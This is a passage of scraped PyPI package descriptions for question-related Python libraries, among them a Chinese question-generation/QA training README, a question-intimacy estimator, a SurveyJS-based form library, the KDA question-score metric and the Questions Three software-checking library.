inputs>>>question_answerer([...{...'question':'\u5728\u5bd2\u51b7\u7684\u51ac\u5929,\u519c\u592b\u5728\u54ea\u91cc\u53d1\u73b0\u4e86\u4e00\u6761\u53ef\u601c\u7684\u86c7?',...'context':text...},...{...'question':'\u519c\u592b\u662f\u5982\u4f55\u770b\u5f85\u86c7\u7684?',...'context':text...},...{...'question':'\u5f53\u519c\u592b\u9047\u5230\u86c7\u65f6,\u4ed6\u505a\u4e86\u4ec0\u4e48?',...'context':text...}])[{'answer':'\u8def\u8fb9','start':18,'end':20,'score':1.0},{'answer':'\u6211\u7adf\u7136\u6551\u4e86\u4e00\u6761\u53ef\u601c\u7684\u6bd2\u86c7\uff0c\u5c31\u5e94\u8be5\u53d7\u5230\u8fd9\u79cd\u62a5\u5e94','start':102,'end':124,'score':0.9996},{'answer':'\u653e\u5728\u6000\u91cc','start':40,'end':44,'score':0.9995}]qa\u7684\u8fd4\u56de\u4e2d\uff0canswer\u4e3a\u7b54\u6848\uff0cstart\u548cend\u5206\u522b\u4e3a\u7b54\u6848\u5728\u539f\u6587\u4e2d\u7684\u5f00\u59cb\u4f4d\u7f6e\u548c\u7ed3\u675f\u4f4d\u7f6e\u5b89\u88c5\u8bf4\u660e\u9700\u8981\u5b89\u88c5pytorch>=1.3, transormfers>=4.12.5 \u548c datasets>=1.15.1, pip\u5b89\u88c5\u901f\u5ea6\u5982\u679c\u8f83\u6162\uff0c\u53ef\u4f7f\u7528\u963f\u91cc\u6e90\uff0c\u5728\u5b89\u88c5\u547d\u4ee4\u540e\u6dfb\u52a0 -ihttps://mirrors.aliyun.com/pypi/simple/cuda\u7248pytorch\u5b89\u88c5pip3installtorch==1.10.0+cu113torchvision==0.11.1+cu113torchaudio==0.10.0+cu113-fhttps://download.pytorch.org/whl/cu113/torch_stable.htmlcup\u7248pytorh\u5b89\u88c5pip3installtorch==1.10.0+cputorchvision==0.11.1+cputorchaudio==0.10.0+cpu-fhttps://download.pytorch.org/whl/cpu/torch_stable.html\u5b89\u88c5transformers\u548cdatasetspipinstalltransformers\npipinstalldatasets\u5b89\u88c5\u672c\u9879\u76eepipinstallquestion_generation\u6a21\u578b\u8bad\u7ec3\u4f60\u53ef\u4ee5\u8bad\u7ec3\u81ea\u5df1\u7684\u95ee\u9898\u751f\u6210\u6a21\u578b\u548c\u95ee\u7b54\u6a21\u578b\u95ee\u9898\u751f\u6210\u6a21\u578b\u8bad\u7ec3\u8bad\u7ec3\u6570\u636e\u683c\u5f0f>>>train.json{\"data\":[{\"source_text\":\"\u5bf9\u4e8e\u67d0\u4e9b\u7269\u7406\u60c5\u51b5\uff0c\u4e0d\u53ef\u80fd\u5c06\u529b\u7684\u5f62\u6210\u5f52\u56e0\u4e8e\u52bf\u7684\u68af\u5ea6\u3002\u8fd9\u901a\u5e38\u662f\u7531\u4e8e\u5b8f\u89c2\u7269\u7406\u7684\u8003\u8651\uff0c\u5c48\u670d\u529b\u4ea7\u751f\u4e8e\u5fae\u89c2\u72b6\u6001\u7684\u5b8f\u89c2\u7edf\u8ba1\u5e73\u5747\u503c\u3002\u4f8b\u5982\uff0c\u6469\u64e6\u662f\u7531\u539f\u5b50\u95f4\u5927\u91cf\u9759\u7535\u52bf\u7684\u68af\u5ea6\u5f15\u8d77\u7684\uff0c\u4f46\u8868\u73b0\u4e3a\u72ec\u7acb\u4e8e\u4efb\u4f55\u5b8f\u89c2\u4f4d\u7f6e\u77e2\u91cf\u7684\u529b\u6a21\u578b\u3002\u975e\u4fdd\u5b88\u529b\u9664\u6469\u64e6\u529b\u5916\uff0c\u8fd8\u5305\u62ec\u5176\u4ed6\u63a5\u89e6\u529b\u3001\u62c9\u529b\u3001\u538b\u7f29\u529b\u548c\u963b\u529b\u3002\u7136\u800c\uff0c\u5bf9\u4e8e\u4efb\u4f55\u8db3\u591f\u8be6\u7ec6\u7684\u63cf\u8ff0\uff0c\u6240\u6709\u8fd9\u4e9b\u529b\u90fd\u662f\u4fdd\u5b88\u529b\u7684\u7ed3\u679c\uff0c\u56e0\u4e3a\u6bcf\u4e00\u4e2a\u5b8f\u89c2\u529b\u90fd\u662f\u5fae\u89c2\u52bf\u68af\u5ea6\u7684\u51c0\u7ed3\u679c\u3002\",\"target_text\":\"\u62c9\u529b\u3001\u538b\u7f29\u548c\u62c9\u529b\u662f\u4ec0\u4e48\u529b?{sep_token}\u9759\u7535\u68af\u5ea6\u7535\u52bf\u4f1a\u4ea7\u751f\u4ec0\u4e48?{sep_token}\u4e3a\u4ec0\u4e48\u8fd9\u4e9b\u529b\u662f\u65e0\u6cd5\u5efa\u6a21\u7684\u5462?\"}{\"source_text\":\"\u7eff\u5b9d\u77f3\u5931\u7a83\u6848 \uff08\u6cd5\u8bed\uff1a Les Bijoux de la Castafiore \uff1b\u82f1\u8bed\uff1a The Castafiore Emerald 
\uff09\u662f\u4e01\u4e01\u5386\u9669\u8bb0\u7684\u7b2c21\u90e8\u4f5c\u54c1\u3002\u4f5c\u8005\u662f\u6bd4\u5229\u65f6\u6f2b\u753b\u5bb6\u57c3\u5c14\u70ed\u3002\u672c\u4f5c\u4e0e\u4e4b\u524d\u7684\u4e01\u4e01\u5386\u9669\u8bb0\u6709\u8457\u5f88\u5927\u7684\u4e0d\u540c\uff0c\u4e01\u4e01\u9996\u6b21\u8fdb\u884c\u6ca1\u6709\u79bb\u5f00\u81ea\u5df1\u5bb6\u7684\u5192\u9669\uff0c\u540c\u65f6\u6545\u4e8b\u4e2d\u6ca1\u6709\u660e\u663e\u7684\u53cd\u6d3e\u89d2\u8272\uff0c\u5145\u6ee1\u4e86\u559c\u5267\u8272\u5f69\u3002\u4e01\u4e01\u548c\u8239\u957f\u539f\u672c\u5728\u57ce\u5821\u60a0\u95f2\u5ea6\u5047\uff0c\u5374\u56e0\u6b4c\u540e\u7a81\u7136\u9020\u8bbf\u800c\u5f04\u5f97\u9e21\u98de\u72d7\u8df3\uff1b\u5a92\u4f53\u5bf9\u6b4c\u540e\u7684\u884c\u8e2a\u6781\u5ea6\u5173\u6ce8\uff0c\u7a77\u8ffd\u731b\u6253\uff1b\u6b4c\u540e\u4e00\u9897\u73cd\u8d35\u7684\u7eff\u5b9d\u77f3\u53c8\u7a81\u7136\u5931\u8e2a\uff0c\u5f15\u8d77\u4e86\u4e00\u6ce2\u63a5\u4e00\u6ce2\u7684\u7591\u56e2\uff0c\u7a76\u7adf\u8c01\u7684\u5acc\u7591\u6700\u5927\uff1f\u662f\u8239\u957f\u521a\u521a\u6536\u7559\u7684\u4e00\u4f19\u5409\u535c\u8d5b\u4eba\uff1f\u662f\u5077\u5077\u6df7\u5165\u8bb0\u8005\u7fa4\u4e2d\u7684\u795e\u79d8\u7537\u5b50\uff1f\u662f\u6b4c\u540e\u7684\u8d34\u8eab\u5973\u4ec6\uff1f\u8fd8\u662f\u884c\u8ff9\u9b3c\u795f\u7684\u94a2\u7434\u5e08\uff1f\"\uff0c\"target_text\":\"\u6545\u4e8b\u4e2d\u5f15\u8d77\u4f17\u591a\u8c1c\u56e2\u7684\u539f\u56e0\u662f\uff1f{sep_token}\u6b64\u90e8\u4f5c\u54c1\u4e0e\u4ee5\u5f80\u4e0d\u540c\u7684\u5730\u65b9\u5728\u4e8e\u54ea\u91cc\uff1f{sep_token}\u4e01\u4e01\u548c\u8239\u957f\u7684\u60a0\u95f2\u5047\u671f\u56e0\u4f55\u88ab\u6253\u4e71\uff1f{sep_token}\u300a\u7eff\u5b9d\u77f3\u5931\u7a83\u6848\u300b\u662f\u300a\u4e01\u4e01\u5386\u9669\u8bb0\u300b\u7cfb\u5217\u7684\u7b2c\u51e0\u90e8\uff1f{sep_token}\u300a\u7eff\u5b9d\u77f3\u5931\u7a83\u6848\u300b\u7684\u4f5c\u8005\u662f\u8c01\uff1f\"}...]}\u8bad\u7ec3\u914d\u7f6e\u6587\u4ef6>>>qg_config.json{\"model_name_or_path\":\"google/mt5-small\",\"tokenizer_name\":\"google/mt5-small\",\"text_column\":\"source_text\",\"summary_column\":\"target_text\",\"train_file\":\"data/train.json\",\"validation_file\":\"data/dev.json\",\"output_dir\":\"data/qg\",\"model_type\":\"mt5\",\"overwrite_output_dir\":true,\"do_train\":true,\"do_eval\":true,\"source_prefix\":\"question generation: \",\"predict_with_generate\":true,\"per_device_train_batch_size\":8,\"per_device_eval_batch_size\":8,\"gradient_accumulation_steps\":32,\"learning_rate\":1e-3,\"num_train_epochs\":4,\"max_source_length\":512,\"max_target_length\":200,\"logging_steps\":100,\"seed\":42}\u542f\u52a8\u8bad\u7ec3CUDA_VISIBLE_DEVICES=0 python run_qg.py qg_config.json\u95ee\u7b54\u6a21\u578b\u8bad\u7ec3\u8bad\u7ec3\u6570\u636e\u683c\u5f0f\u4e0esquad_2\u7684\u6570\u636e\u683c\u5f0f\u4e00\u81f4>>>train.json{'version':2.0,'data':[{'id':'c398789b7375e0ce7eac86f2b18c3808','question':'\u9690\u85cf\u5f0f\u884c\u8f66\u8bb0\u5f55\u4eea\u54ea\u4e2a\u724c\u5b50\u597d','context':'\u63a8\u8350\u4f7f\u7528360\u884c\u8f66\u8bb0\u5f55\u4eea\u3002\u884c\u8f66\u8bb0\u5f55\u4eea\u7684\u597d\u574f\uff0c\u53d6\u51b3\u4e8e\u884c\u8f66\u8bb0\u5f55\u4eea\u7684\u6444\u50cf\u5934\u914d\u7f6e\uff0c\u914d\u7f6e\u8d8a\u9ad8\u8d8a\u597d\uff0c\u518d\u5c31\u662f\u6027\u4ef7\u6bd4\u3002 
\u884c\u8f66\u8bb0\u5f55\u4eea\u914d\u7f6e\u9700\u89811296p\u8d85\u9ad8\u6e05\u6444\u50cf\u5934\u6bd4\u8f83\u597d\uff0c\u8fd9\u6837\u5f55\u5236\u89c6\u9891\u6e05\u6670\u5ea6\u9ad8\u3002\u518d\u5c31\u662f\u4ef7\u683c\uff0c\u6027\u4ef7\u6bd4\u9ad8\u4e5f\u662f\u53ef\u4ee5\u503c\u5f97\u8003\u8651\u7684\u3002 360\u884c\u8f66\u8bb0\u5f55\u4eea\u6211\u4f7f\u7528\u4e86\u4e00\u6bb5\u65f6\u95f4 \uff0c\u89c9\u5f97360\u884c\u8f66\u8bb0\u5f55\u4eea\u6bd4\u8f83\u597d\u5f55\u5f97\u5e7f\u89d2\u6bd4\u8f83\u5927\uff0c\u5e76\u4e14\u4fbf\u5b9c\u5b9e\u60e0 \uff0c\u4ef7\u683c\u624d299\uff0c\u5728360\u5546\u57ce\u53ef\u4ee5\u4e70\u5230\u3002\u53ef\u4ee5\u53c2\u8003\u5bf9\u6bd4\u4e0b\u3002','answers':{'answer_start':[4],'text':['360\u884c\u8f66\u8bb0\u5f55\u4eea']}}]}\u8bad\u7ec3\u914d\u7f6e\u6587\u4ef6>>>qg_config.json{\"model_name_or_path\":\"bert-base-chinese\",\"tokenizer_name\":\"bert-base-chinese\",\"train_file\":\"data/train.json\",\"validation_file\":\"data/dev.json\",\"output_dir\":\"data/qa\",\"per_device_train_batch_size\":8,\"per_device_eval_batch_size\":8,\"gradient_accumulation_steps\":32,\"overwrite_output_dir\":true,\"do_train\":true,\"do_eval\":true,\"max_answer_length\":200}\u542f\u52a8\u8bad\u7ec3CUDA_VISIBLE_DEVICES=0 python run_qa.py qa_config.json"} +{"package": "questiongeneratorcesar", "pacakge-description": "This is the first version of the question generator package"} +{"package": "questionify", "pacakge-description": "QuestionifyQuestionifyis a simple desktop software to help you study. The concept is\nsimple; fill it with questions you must practice answering, and it helps you\ngenerate a well-balanced list of questions day after day, allowing you to keep\nyour knowledge sharp.Initially developed for my own need; made public later under theGNU GPLv3license."} +{"package": "question-intimacy", "pacakge-description": "Question-IntimacyIntroquestion-intimacy is a package used to estimate the intimacy of questions. It is released with\nEMNLP 2020 paperQuantifying Intimacy in Language.InstallUse pipIfpipis installed, question-intimacy could be installed directly from it:pip3 install question-intimacyDependenciespython>=3.6.0\ntorch>=1.6.0\ntransformers >= 3.1.0\nnumpy\nmath\ntqdmUsage and ExampleNotes: During your first usage, the package will download a model file automatically, which is about 500MB.Construct the Predictor Object>>> from question_intimacy.predict_intimacy import IntimacyEstimator\n>>> inti = IntimacyEstimator()Cuda is disabled by default, to allow GPU calculation, please use>>> from question_intimacy.predict_intimacy import IntimacyEstimator\n>>> inti = IntimacyEstimator(cuda=True)predictpredictis the core method of this package,\nwhich takes a single text of a list of texts, and returns a list of raw values in[-1,1](higher means more intimate, while lower means less).# Predict intimacy for one question\n>>> text = 'What is this movie ?''\n>>> inti.predict(text,type='list')\n-0.2737383\n\n# Predict intimacy for a list of questions (less than a batch)\n>>> text = ['What is this movie ?','Why do you hate me ?']\n>>> inti.predict(text,type='list')\n[-0.2737383, 0.3481976]\n\n# Predict intimacy for a long list of questions\n>>> text = [a long list of questions]\n>>> inti.predict(text,type='long_list',tqdm=tqdm)\n[-0.2737383, 0.3481976, ... 
,-0.2737383, 0.3481976]ContactJiaxin Pei (pedropei@umich.edu)"} +{"package": "question-myproject", "pacakge-description": "No description available on PyPI."} +{"package": "questionnaire", "pacakge-description": "Check it out on GitHub\u2026"} +{"package": "question-package", "pacakge-description": "No description available on PyPI."} +{"package": "questions", "pacakge-description": "QuestionsQuestions is a Python form library that uses the power ofSurveyJSfor the UI.\nThe philosophy behind Questions is that modern form rendering usually requires\nintegrating some complex Javascript widgets anyway, so why not skip the markup\ngeneration completely?In Questions, forms are defined in Python similarly to other form frameworks,\nbut everything on the front end is handled by SurveyJS. This provides a lot of\nbenefits:Nice, integrated UI, with powerful Javascript widgets.SurveyJS is compatible with Angular2, JQuery, KnockoutJS, React and VueJS.\nQuestions makes sure that you get the right files for each version.More than 20 question types, from simple text inputs and dropdowns to\nelaborate widgets like dynamic panels and checkbox matrices.Multiple look and feel options (themes), includingBootstrapCSS support.Full client side validation (plus server side checking, too).Use simple text expressions in question declarations to control which\nquestions to show depending on the answers to previous ones.Complex forms can be defined easily using class composition.Easy multi-page forms, with no state-keeping headaches.Create forms directly from JSON definitions using SurveyJS form creator.Generate Python code from dynamic JSON import.Minimal code for simple apps. If you just need a form or two, you are set.Zero Javascript code option. If you can use a CDN, no need to install or\ndownload any javascript.Out of the box integration with popular third party widgets, likeselect2andckeditor.Supports the creation of tests and quizzes, by defining \u201ccorrect\u201d answers to\nthe questions, and optionally setting a maximum time to finish.How the Code LooksTo get a feel for how Questions works, nothing better than looking at a simple\nexample:from questions import Form\nfrom questions import TextQuestion\nfrom questions import RadioGroupQuestion\n\n\nclass SimpleForm(Form):\n name = TextQuestion()\n email = TextQuestion(input_type=\"email\", required=\"True\")\n favorite_number = TextQuestion(title=\"What is your favorite number?\",\n input_type=\"number\")\n language = RadioGroupQuestion(title=\"Favorite Language\",\n choices=[\"Python\", \"Other\"])\n version = RadioGroupQuestion(title=\"Preferred Python Version\",\n choices=[\"Python 2\", \"Python 3\"],\n visible_if=\"{language} = 'Python'\")This is a fairly conventional way to define forms, so no surprises here, but\nlook at the way theinput_typeparameter allows us to use different HTML5\ntext input methods. Pay special attention to the last line, where we use thevisible_ifparameter to only show the Python version question if the\nanswer to thelanguagequestion is \u201cPython\u201d. Defining \u201clive\u201d form behavior\nin this way is something that is usually out of scope for server side code,\nbut Questions\u2019 SurveyJS integration allows us to do it.Full Working Multi-page Flask ApplicationLet\u2019s show how easy things can be if your applications needs are simple. 
The\nfollowing is a complete application using the popularFlaskweb framework:from flask import Flask\nfrom flask import redirect\nfrom flask import request\n\nfrom questions import Form\nfrom questions import FormPage\nfrom questions import TextQuestion\nfrom questions import DropdownQuestion\n\n\nclass PageOne(Form):\n name = TextQuestion()\n email = TextQuestion(input_type=\"email\", required=\"True\")\n\n\nclass PageTwo(Form):\n country = DropdownQuestion(choices_by_url={\"value_name\": \"name\",\n \"url\": \"https://restcountries.eu/rest/v2/all\"})\n birthdate = TextQuestion(input_type=\"date\")\n\n\nclass Profile(Form):\n page_one = FormPage(PageOne, title=\"Identification Information\")\n page_two = FormPage(PageTwo, title=\"Additional Information\")\n\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods=(\"GET\",))\ndef form():\n form = Profile()\n return form.render_html()\n\n@app.route(\"/\", methods=(\"POST\",))\ndef post():\n form_data = request.get_json()\n # Here, we would save to a database or something\n print(form_data)\n return redirect(\"/thanks\")\n\n@app.route(\"/thanks\")\ndef thanks():\n return \"Thanks for your information\"\n\nif __name__ == \"__main__\":\n app.run()By default, Questions uses a CDN for fetching the Javascript resources, which\nis why all that is needed to run the above code is installing Flask and\nQuestions. Of course, it is possible to install all the dependencies yourself\nand configure Questions to use your installation, but sometimes this is all\nthat\u2019s required to get a full working application.Admittedly, our application doesn\u2019t do much, but we get a working form that you\ncan fill and submit in your browser. See how easy it is to get a multi-page\nform with navigation buttons. Also, notice howget_jsonis the only Flask\nrequest call we need to get the form data.As the code shows, defining a multiple page form is very simple, and allows us\nto keep the form pages logically separated, and even using them independently\nor in combination with other forms with little additional work.Finally, take a look at thechoices_by_urlparameter in the\nDropdownQuestion, which allows us to get the dropdown choices from separate,\nrestful web services.License and DocumentationFree software: MIT licenseDocumentation:https://questions.readthedocs.io.CreditsThis package was created withCookiecutterand theaudreyr/cookiecutter-pypackageproject template.History0.5.0a0 (2020-10-01)First release on PyPI.0.5.0a1 (2020-12-09)Fix bug that caused Questions to crash when two or more panels were used in\none form.Add feature for creating Form subclasses from JSON data.Add screencast to README page.Update docs.Update dependencies to latest versions.0.5.0a2 (2020-12-09)Fix bug with form parameters in from_json conversion.0.5.0a3 (2020-12-10)Make sure jinja templates are included in manifest.0.7.0a4 (2020-12-13)Update installation docs to mention typing-extensions requirement for\nPython < 3.8.Use correct default value for allow_clear in signature pad.Set type hints to allow localization arrays in visible text properties.Fix bug when generating classes from JSON with dynamic panels.Add string representation methods to main classes.Feature: add console script for generating code for classes created with\nfrom_json method.0.7.1 (2022-09-18)Bug fix: do not add a default page when other pages are defined.Update js CDN and tests.0.8.0 (2023-04-10)Bug fix: fix choices with translatable text (thanks @joan-qida).Bug fix: fix read the docs build.Update SurveyJS version.Use 
current SurveyJS supported themes.Include newer Python versions in tests.Add documentation for i18n.Various dependency updates."} +{"package": "question-score", "pacakge-description": "question-scoreRepository for KDA(Knowledge-dependent Answerability), EMNLP 2022 workHow to usepip install --upgrade pip\npip install question-scorefromquestion_scoreimportKDAkda=KDA()print(kda.kda_small(\"passage\",\"question\",[\"option1\",\"option2\",\"option3\",\"option4\"],1))What does the score mean?You can check the explanation of KDA onEMNLP 2022 papernow.\nThe official link from EMNLP 2022 will soon be released.You can use $KDA_{small}$ or $KDA_{large}$ instead of heavy metric using all model.\nBelow is the performance of the submetrics, which mentioned on the appendix of the paper.Sub MetricModel Count ( Total Size )KDA (Valid)Likert (Test)KDA_small4 (3.5GB)0.7400.377KDA_large10 (19.2GB)0.7840.421Citation@inproceedings{moon-etal-2022-evaluating,\n title = \"Evaluating the Knowledge Dependency of Questions\",\n author = \"Moon, Hyeongdon and\n Yang, Yoonseok and\n Yu, Hangyeol and\n Lee, Seunghyun and\n Jeong, Myeongho and\n Park, Juneyoung and\n Shin, Jamin and\n Kim, Minsam and\n Choi, Seungtaek\",\n booktitle = \"Proceedings of the 2022 Conference on Empirical Methods in Natural Language Processing\",\n month = dec,\n year = \"2022\",\n address = \"Abu Dhabi, United Arab Emirates\",\n publisher = \"Association for Computational Linguistics\",\n url = \"https://aclanthology.org/2022.emnlp-main.718\",\n pages = \"10512--10526\",\n abstract = \"The automatic generation of Multiple Choice Questions (MCQ) has the potential to reduce the time educators spend on student assessment significantly. However, existing evaluation metrics for MCQ generation, such as BLEU, ROUGE, and METEOR, focus on the n-gram based similarity of the generated MCQ to the gold sample in the dataset and disregard their educational value.They fail to evaluate the MCQ{'}s ability to assess the student{'}s knowledge of the corresponding target fact. To tackle this issue, we propose a novel automatic evaluation metric, coined Knowledge Dependent Answerability (KDA), which measures the MCQ{'}s answerability given knowledge of the target fact. Specifically, we first show how to measure KDA based on student responses from a human survey.Then, we propose two automatic evaluation metrics, KDA{\\_}disc and KDA{\\_}cont, that approximate KDA by leveraging pre-trained language models to imitate students{'} problem-solving behavior.Through our human studies, we show that KDA{\\_}disc and KDA{\\_}soft have strong correlations with both (1) KDA and (2) usability in an actual classroom setting, labeled by experts. Furthermore, when combined with n-gram based similarity metrics, KDA{\\_}disc and KDA{\\_}cont are shown to have a strong predictive power for various expert-labeled MCQ quality measures.\",\n}"} +{"package": "questions-pkg-joanclopezm", "pacakge-description": "___ ______ ____ _ _ ___ \n / \\ \\ / / ___| / ___| | ___ _ _ __| |/ _ \\ \n / _ \\ \\ /\\ / /\\___ \\ | | | |/ _ \\| | | |/ _` | (_) |\n / ___ \\ V V / ___) | | |___| | (_) | |_| | (_| |\\__, |\n /_/ \\_\\_/\\_/ |____/ \\____|_|\\___/ \\__,_|\\__,_| /_/"} +{"package": "question-stack", "pacakge-description": "UNKNOWN"} +{"package": "questions-three", "pacakge-description": "Questions ThreeA Library for Serious Software Interrogators (and silly ones too)Stop! 
Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.-- The KeeperWhy you want thisThe vast majority of support for automatedsoftware checkingfalls into two main groups: low-level unit checking tools that guide design and maintain control over code as it is being written, andhigh-level system checkingtools that reduce the workload of human testers after the units have been integrated.The first group is optimized for precision and speed. A good unit check proves exactly one point in milliseconds. The second group is optimized for efficient use of human resources, enabling testers to repeat tedious actions without demanding much (or any) coding effort.Engineering is all about trade-offs. We can reduce the coding effort, but only if we are willing to sacrifice control. This makes the existing high-level automation tools distinctly unsatisfactory to testers who would prefer the opposite trade: more control in exchange for the need to approach automation as abona-fidesoftware development project.If you want complete control over your system-level automation and are willing to get some coding dirt under your fingernails in exchange, then Questions Three could be your best friend.As a flexible library rather than an opinionated framework, it will support you without dictating structures or rules. Its features were designed to work together, but you can use them separately or even integrate them into the third-party or homegrown framework of your choice.A note on heretical terminologyThe vast majority of software professionals refer to inspection work done by machines as \"automated testing.\" James Bach and Michael Bolton makea strong casethat this is a dangerous abuse of the word \"testing\" and suggest that we use \"checking\" instead when we talk about executing a procedure with a well-defined expected outcome.Questions Three tries to maintain neutrality in this debate. Where practical, it lets you choose whether you want to say \"test\" or \"check.\" Internally, it uses \"test\" for consistency with third-party libraries. As the public face of the project, this documentation falls on the \"check\" side. It says \"check suite\" where most testers would say \"test suite.\"Orientation ResourcesArticle:\"Waiter, There's aDatabasein My Unit Test!\"explains the differences between unit, integration, and system testing and the role for each.Video:\"Industrial Strength Automation\"presentation from STARWEST 2019 makes the cases for and against building a serious automation program. It concludes with an extended discussion on the history, purpose, and design of Questions Three.What's in the BoxScaffoldsthat help you structure your checks. Chose one from the library or use them as examples to build your own.Reportersthat provide results as expected by various readers. Use as many or as few as you would like, or follow the design pattern and build your own.Event Brokerwhich allows components to work together without knowing about one another. Need to integrate a new kind of reporter? Simply contact the broker and subscribe to relevant events. 
No need to touch anything else.HTTP Clientthat tracks its own activity and converts failures to meaningful artifacts for test reports.GraphQL Clientthat leverages the HTTP Client for an easy to use GraphQL interface.Logging Subsystemthat, among other things, allows you to control which modules log at which level via environment variables.Vanilla Functionsthat you might find useful for checking and are entirely self-contained. Use as many or as few as you would like.Bulk Suite Runnerthat lets you run multiple suites in parallel and control their execution via environment variables.Optional PackagesAmazon Web Services IntegrationsSelenium Integrationsthat facilitate compatibility checking and make Selenium WebDriver a full citizen of Question-Three's event-driven world.Quick StartInstall questions-threepip install questions-threeWrite the suitefrom questions_three.scaffolds.check_script import check, check_suite\n\nwith check_suite('ExampleSuite'):\n\n with check('A passing check'):\n assert True, 'That was easy'Run the suiteNo special executors are required. Just run the script:python example_suite.pyReview the resultsThe console output should look like this:2018-08-13 14:52:55,725 INFO from questions_three.reporters.event_logger.event_logger: Suite \"ExampleSuite\" started\n2018-08-13 14:52:55,726 INFO from questions_three.reporters.event_logger.event_logger: Check \"A passing check\" started\n2018-08-13 14:52:55,726 INFO from questions_three.reporters.event_logger.event_logger: Check \"A passing check\" ended\n2018-08-13 14:52:55,729 INFO from questions_three.reporters.event_logger.event_logger: Suite \"ExampleSuite\" endedThere should also be a reports directory which contains a report:> ls reports\nExampleSuite.xml jenkins_statusExampleSuite.xml is a report in theJUnit XMLformat that can be consumed by many report parsers, including Jenkins CI. It gets produced by the junit_reporter module.jenkins_status is a plain text file that aggregates the results of all test suites from a batch into a single result which Jenkins can display. It gets produced by the jenkins_build_status module.ScaffoldsScaffolds provide a basic structure for your checks. 
Their most important function is to publish events as your checks start, end, and fail.The top-to-bottom script scaffoldfrom questions_three.scaffolds.check_script import check, check_suite\n\nwith check_suite('ExampleSuite'):\n\n with check('A passing check'):\n assert True, 'That was easy'\n\n with check('A failing check'):\n assert False, 'Oops'If you don't like saying \"check,\" you can say \"test\" instead:from questions_three.scaffolds.test_script import test, test_suite\n\nwith test_suite('ExampleSuite'):\n\n with test('A passing check'):\n assert True, 'That was easy'\n\n with test('A failing check'):\n assert False, 'Oops'This code is an ordinary executable python script, so you can simply execute it normally.python example_suite.pyThe xUnit style scaffoldAs its name suggests, the xUnit scaffold implements the well-wornxUnit pattern.from questions_three.scaffolds.xunit import TestSuite, skip\n\n\nclass MyXunitSuite(TestSuite):\n\n def setup_suite(self):\n \"\"\"\n Perform setup that affects all tests here\n Changes to \"self\" will affect all tests.\n \"\"\"\n print('This runs once at the start of the suite')\n\n def teardown_suite(self):\n print('This runs once at the end of the suite')\n\n def setup(self):\n \"\"\"\n Perform setup for each test here.\n Changes to \"self\" will affect the current test only.\n \"\"\"\n print('This runs before each test')\n\n def teardown(self):\n print('This runs after each test')\n\n def test_that_passes(self):\n \"\"\"\n The method name is xUnit magic.\n Methods named \"test...\" get treated as test cases.\n \"\"\"\n print('This test passes')\n\n def test_that_fails(self):\n print('This test fails')\n assert False, 'I failed'\n\n def test_that_errs(self):\n print('This test errs')\n raise RuntimeError('I tried to think but nothing happened')\n\n def test_that_skips(self):\n print('This test skips')\n skip(\"Don't do that\")The most important advantage of the xUnit scaffold over the script one is that it automatically repeats the same set-up and tear-down routines betweentest_...functions. 
Its main disadvantage is that the suites aren't as beautiful to read.Thanks to some metaclass hocus-pocus which you're free to gawk at by looking at the source code, this too is an ordinary Python executable file:python my_xunit_suite.pyThe Test Table ScaffoldThe Test Table scaffold was designed to support two use cases:You would like to repeat the same procedure with different sets of arguments.You would like to execute the same procedure multiple times to measure performance.Example test table that varies argumentsfrom expects import expect, equal\nfrom questions_three.scaffolds.test_table import execute_test_table\n\nTABLE = (\n ('x', 'y', 'expect sum', 'expect exception'),\n (2, 2, 4, None),\n (1, 0, 1, None),\n (0, 1, 0, None),\n (0.1, 0.1, 0.2, None),\n (1, 'banana', None, TypeError),\n (1, '1', None, TypeError),\n (2, 2, 5, None))\n\n\ndef test_add(*, x, y, expect_sum):\n expect(x + y).to(equal(expect_sum))\n\n\nexecute_test_table(\n suite_name='TestAddTwoThings', table=TABLE, func=test_add)Example test table that measures performancefrom questions_three.scaffolds.test_table import execute_test_table\n\nTABLE = (\n ('operation', 'sample size'),\n ('1 + 1', 30),\n ('1 * 1', 60),\n ('1 / 1', 42))\n\n\ndef calculate(operation):\n exec(operation)\n\n\nexecute_test_table(\n suite_name='MeasureOperatorPerformance',\n table=TABLE, func=calculate, randomize_order=True)The optionalrandomize_orderargument instructs the scaffold to execute the rows\nin a random order (to mitigate systematic bias that could affect measurements).For each row that exits cleanly (no assertion failures or other exceptions),\nthe scaffold publishes a SAMPLE_MEASURED event that a reporter can collect.\nFor example, the built-in EventLogger logs each of these events, including\nthe row execution time.Like the other built-in scaffolds, the Test Table produces plain old Python executable scripts.Building your own scaffoldNothing stops you from building your own scaffold. The test_script scaffold makes a good example of the services your scaffold should provide. The xUnit scaffold is much more difficult to understand (but more fun if you're into that sort of thing).The key to understanding scaffold design is to understand theevent-driven nature of Questions Three. Scaffolds are responsible for handling exceptions and publishing the following events:SUITE_STARTEDSUITE_ERREDSUITE_ENDEDTEST_SKIPPEDTEST_STARTEDTEST_ERREDTEST_FAILEDTEST_ENDEDReportersIn Questions Three, \"reporter\" is a broad term for an object that listens for an event, converts it to a message useful to someone or something and sends the message. Built-in reporters do relatively dull things like sending events to the system log and producing the Junit XML report, but there is no reason you couldn't build a more interesting reporter that launches a Styrofoam missile at the developer who broke the build.Built-in reportersNameEvents it subscribes towhat it doesArtifact SaverARTIFACT_CREATED, REPORT_CREATEDSaves artifacts to the local filesystem.Event Loggerall test lifecycle eventsSends messages to system log.Junit Reporterall test lifecycle eventsBuilds Junit XML reports and publishes them as REPORT_CREATED events.Result Compilerall test lifecycle eventsReports how many tests ran, failed, etc, and how long they took. Publishes SUITE_RESULTS_COMPILED after SUITE_ENDED.Custom reportersA reporter can do anything you dream up and express as Python code. That includes interacting with external services and physical objects. 
Think \"when this occurs during a test run, I want that to happen.\" For example, \"When the suite results are compiled and contain a failure, I want a Slack message sent to the channel where the developers hang out.\"Building a custom reporterResult Compiler provides a simple example to follow. You don't have to copy the pattern it establishes, but it's an easy way to start. TheResultCompilerclass has one method for each event to which it subscribes. Each method is named after the event (e.g.on_suite_started). These method names are magic. The importedsubscribe_event_handlersfunction recognizes the names and subscribes each method to its respective event. Theactivatemethod is mandatory. The scaffold calls it before the suite starts.activateperforms any initialization, most importantly subscribing to the events.Installing a custom reporterEnsure that the package containing your reporter is installed.Create a text file that contains the name of the reporter class, including its module (e.g.my_awesome_reporters.information_radiators.LavaLamp). This file can contain as many reporters as you would like, one per line.Set the environment variableCUSTOM_REPORTERS_FILEto the full path and filename of your text file.Event BrokerThe Event Broker is Questions Three's beating heart. It's how the components communicate with one another. If you're not in the business of building custom components and plugging them in, you won't need to think about the Event Broker. If you are, it's all you'll need to think about.The Event Broker is 